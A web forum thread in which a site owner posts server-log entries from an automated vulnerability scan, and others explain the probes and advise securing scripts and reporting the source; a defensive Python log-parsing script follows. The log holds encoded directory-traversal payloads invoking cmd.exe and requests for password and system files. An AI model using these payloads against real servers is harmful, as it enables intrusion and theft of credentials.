  1. #1
    Devil's Reject Electropulse's Avatar
    Join Date
    January 18th, 2005
    Posts
    987
    Help me, what is all this in my logs? There's more but I had to shorten it. Is someone probing for vulnerabilities?

    /cgi-bin/formmail.cgi 9
    /cgi-bin/formmail.pl 8
    /_vti_bin/_vti_aut/dvwssr.dll 3
    /piranha/secure/passwd.php3 3
    /cgi-bin/webgais 2
    /default.asp 2
    /cgi-bin/webspirs.cgi 2
    /administrator/ 2 http://
    /pservlet.html 1 http://
    /samples/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir 1 http://
    /scripts/Carello/add.exe 1 http://
    /Rpc/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir 1 http://
    /scripts/no-such-file.pl 1 http://
    /scripts/dnewsweb.exe 1 http://
    /program/ 1 http://
    /MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c 1 http://
    /tools/ 1 http://
    /index.html.bak 1 http://
    /bbs/ 1 http://
    /adsamples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir 1 http://
    /null.htw?CiWebHitsFile=/index.asp%20&CiRestriction=none&CiHiliteType=Full 1 http://
    /img/ 1 http://
    /_vti_pvt/administrators.pwd 1 http://
    /logging/ 1 http://
    /Stats/ 1 http://
    /cgi-bin/ceilidh.exe 1 http://
    /phorum/common.php 1 http://
    /server_stats/ 1 http://
    /lib/ 1 http://
    /cgi-bin/classifieds.cgi 1 http://
    /iissamples/sdk/asp/docs/codebrws.asp 1 http://
    /d/inetpub/scripts/root.exe?/c+dir 1 http://
    /cgi-bin/bbs_forum.cgi
    /cgi-bin/cal_make.pl 1 http://
    /cfdocs/expeval/displayopenedfile.cfm 1 http://
    /admin.php3?admin=anything 1 http://
    /iisadmpwd/anot3.htr 1 http://
    /cgi-bin/test.bat 1 http://
    /cache-stats/ 1 http://
    /cgi-bin/view-source 1 http://
    /bbs/include/ 1 http://
    /ROADS/cgi-bin/search.pl 1 http://
    /cgi-bin/perlshop.cgi 1 http://
    /cgi-bin/FormMail.cgi 1 -
    /logfile/ 1 http://
    /iisadmpwd/aexp.htr 1 http://
    /.htpasswd/ 1 http://
    /cgi-bin/cvsweb/cvsweb.cgi 1 http://
    /test.ida 1 http://
    /test.idc 1 http://
    /cgi-bin/day5datanotifier.cgi 1 http://
    /wstats/ 1 http://
    /misc/ 1 http://
    /cgi-bin/register.cgi 1 http://
    /bbs/db/ 1 http://
    /ports/ 1 http://
    /iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/config/system.log&CiRestriction=none&CiHiliteType=Full 1 http://
    /cgi-bin/input2.bat 1 http://
    /cgi-bin/phf 1 http://
    /test.idq 1 http://
    /banners.php?op=Change 1 http://
    /cgi-bin/faxsurvey 1 http://
    /cgi-bin/info2www 1 http://
    /technote/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi 1 http://
    /_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir 1 http://
    /cgi-bin/php 1 http://
    /test.idw 1 http://
    /msql/ 1 http://
    /test/ 1 http://
    /exchange/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir 1 http://
    /wwwstats.html 1 http://
    /....../autoexec.bat 1 http://
    /cgi-bin/whois_raw.cgi 1 http://
    /sql/ 1 http://
    /cgi-bin/dmailweb.cgi 1 http://
    /private/.htpasswd 1 http://
    /cgi-bin/Search.pl 1 http://
    /MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c 1 http://
    /ows-bin/perlidlc.bat?&dir 1 http://
    /phpgroupware/inc/phpgwapi/phpgw.inc.php 1 http://
    /wwwstats/ 1 http://
    /bin/common/user_update_passwd.pl 1 http://
    /down/ 1 http://
    /isapi/tstisapi.dll 1 http://
    /backup/ 1 http://
    /cgi-bin/htmlscript 1 http://
    /scripts/c32web.exe 1 http://
    /cgi-auth/userreg.cgi 1 http://
    /girls/ 1 http://
    /iisadmpwd/aexp4b.htr 1 http://
    /cgi/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c 1 http://
    /cgi-bin/phf.cgi 1 http://
    /cgi-bin/wconsole.dll 1 http://
    /c/inetpub/scripts/root.exe?/c+dir 1 http://
    /bin/common/user_update_admin.pl 1 http://
    /cgi-bin/YaBB.pl 1 http://
    /cgi/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir 1 http://
    /snort2html.html 1 http://
    /caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000 1 http://
    /cgi-bin/dumpenv.pl 1 http://
    /Newuser?Image=../../database/rbsserv.mdb 1 http://
    /cgi-bin/hello.bat 1 http://
    /image/ 1 http://
    /cgi-bin/alibaba.pl 1 http://
    /wwwlog/ 1 http://
    /cgi-bin/cached_feed.cgi 1 http://
    /cgi-bin/test-cgi 1 http://
    /INDUSTRY 1 -
    /includes/ 1 http://
    /technote/print.cgi 1 http://
    /cgi-bin/counterfiglet/nc/f 1 http://
    /cgi-bin/subscribe.pl 1 http://
    /phpPhotoAlbum/explorer.php 1 http://
    /common/browser.inc 1 http://
    /cgi-bin/bb-hist.sh 1 http://
    /cgi-bin/pagelog.cgi 1 http://
    /bbs/data/ 1 http://
    /cgi-bin/tst.bat 1 http://
    /caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd 1 http://
    /user.php&op=saveuser 1 http://
    /_vti_pvt/users.pwd 1 http://
    /iissamples/exair/search/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/config/system.log&CiRestriction=none&CiHiliteType=Full 1 http://
    /databases/ 1 http://
    /cgi-bin/mailform.pl 1 http://
    /cgi-bin/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir 1 http://
    /cpqlogin.htm 1 http://
    /PBServer/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir 1 http://
    /_mem_bin/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir 1 http://
    /iisadmpwd/aexp3.htr 1 http://
    /cgi-bin/global.cgi 1 http://
    /scripts/dmailweb.exe 1 http://
    /public/ 1 http://
    /login.asp%3F+.htr 1 http://
    /acid/ 1 http://
    /cgi-bin/ikonboard/help.cgi 1 http://
    /bin/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir 1 http://
    /cgi-bin/handler 1 http://
    /document/ 1 http://
    /iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c 1 http://
    /cgi-bin/cachemgr.cgi 1 http://
    /cgi-bin/ad.cgi 1 http://
    /cgi-bin/responder.cgi 1 http://
    /cgi-bin/calender_admin.pl 1 http://
    /log.html 1 http://
    /catalog.nsf 1 http://
    /iissamples/exair/search/advsearch.asp 1 http://
    /global.asa+.htr 1 http://
    /cgi-bin/input.bat 1 http://
    /cgi-bin/rguest.exe

  2. #2
    ABW Ambassador
    Join Date
    January 18th, 2005
    Posts
    2,402
    That is someone looking for a vulnerability in your system. Oftentimes, they are looking for Windows exploits, but in your case they are looking for exploits with various CGI scripts. If you are not running any of those programs, there isn't a lot to worry about. If you are, you want to double check and make sure everything is either secure or removed.

    A good example I've seen is a program that uses an install script. The install script for this program should be removed after you have installed it...problem is many people will leave it up...a program like you're seeing will call the URL with the install script and it will wipe out someone's board or whatever program it was. Hope this explanation helps.

    TH Media-Web Solutions For The Small Business
    Check Out The TH Media Affiliate Program

  3. #3
    ABW Ambassador
    Join Date
    January 18th, 2005
    Posts
    2,402
    BTW, I should add that it is software that snoops around looking for those scripts...it isn't necessarily someone directing it personally towards you.


  4. #4
    ABW Ambassador
    Join Date
    January 18th, 2005
    Posts
    2,341
    quote: Originally posted by TH Media:
    "....you want to double check and make sure everything is either secure or removed."

    How do we make sure things are secure?

    Andy Williams

    Keyword DARTs - New search engine optimization software
    http://www.affiliate-masters.co.uk/k...timization.htm

  5. #5
    ABW Ambassador
    Join Date
    January 18th, 2005
    Posts
    4,423
    If you install Bastille or other firewall software, it will drop this person's attempts if they probe too many times, not perfect but it helps.

    And this makes a good case for always installing software in non-standard directories (naming) and always being careful about what is in your cgi-bin.

    People like to say obscurity isn't security, but that is foolish. Sure, if someone was trying to hack your particular site it would not help, but this just looks like a kiddie scanning away looking for any target; in that case obscurity helps.

    Do you have the IP? Trace it back and report the scanner. It is probably a compromised box or some kiddie's home account. Either way it helps to inform the person.

    Chet

  6. #6
    ABW Ambassador FFoc's Avatar
    Join Date
    January 18th, 2005
    Posts
    1,015
    I trace it back to the ISP and send an email off to the ISP's abuse@.. email address - the attack probes usually stop pretty quick.

    Ford Fox-body Owners Club
    http://www.ford-fox.org

  7. #7
    Devil's Reject Electropulse's Avatar
    Join Date
    January 18th, 2005
    Posts
    987
    Hey, thanks guys, I only have awstats running on my site.

    Right now I'm checking the raw logs for the IP or bot so I can ban it.

    Thanks.
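
An added example (not code from any poster in this thread) of the raw-log check described in the last post: it groups requests by client IP and tags the encoded directory-traversal probes that appear in the first post's log. It assumes Apache common/combined log format; the function names, the `min_missing` threshold and the sample lines (documentation IP addresses) are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache common/combined log line: client IP, request path, status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+)[^"]*" (\d{3}) ')
# Overlong UTF-8 encodings of "/" and "\" seen in the thread's log
OVERLONG = re.compile(r'%c0%af|%c1%9c', re.I)
WIN_TARGETS = re.compile(r'cmd\.exe|root\.exe|winnt/system32', re.I)

def fully_decode(path, rounds=3):
    """Percent-decode repeatedly so %255c and %25%35%63 both collapse to a backslash."""
    for _ in range(rounds):
        path = unquote(path, encoding="latin-1")
    return path

def classify(path):
    """Return the set of probe signatures a request path matches."""
    tags = set()
    if OVERLONG.search(path):
        tags.add("overlong-utf8")
    decoded = fully_decode(path).replace("\\", "/")
    if "../" in decoded:
        tags.add("traversal")
    if WIN_TARGETS.search(decoded):
        tags.add("windows-target")
    return tags

def find_scanners(lines, min_missing=5):
    """Flag IPs that hit many distinct missing paths or sent any signature match."""
    missing, hits = defaultdict(set), defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path, status = m.groups()
        if status == "404":
            missing[ip].add(path)
        hits[ip] |= classify(path)
    return {ip: sorted(hits[ip]) for ip in set(hits)
            if len(missing[ip]) >= min_missing or hits[ip]}

# Constructed sample lines; the probe paths are copied from the log in the first post
SAMPLE = [
    '192.0.2.10 - - [18/Jan/2005:10:00:01 +0000] "GET /MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c HTTP/1.0" 404 208',
    '192.0.2.10 - - [18/Jan/2005:10:00:02 +0000] "GET /samples/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 208',
    '198.51.100.7 - - [18/Jan/2005:10:05:00 +0000] "GET /index.html HTTP/1.1" 200 5120',
    '198.51.100.7 - - [18/Jan/2005:10:05:03 +0000] "GET /favicon.ico HTTP/1.1" 404 208',
]
```

`find_scanners(SAMPLE)` flags only 192.0.2.10; the ordinary visitor with a single missing favicon stays below the threshold. The IPs it returns are the ones to look up and report to the owning ISP's abuse contact, as suggested in the replies above.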
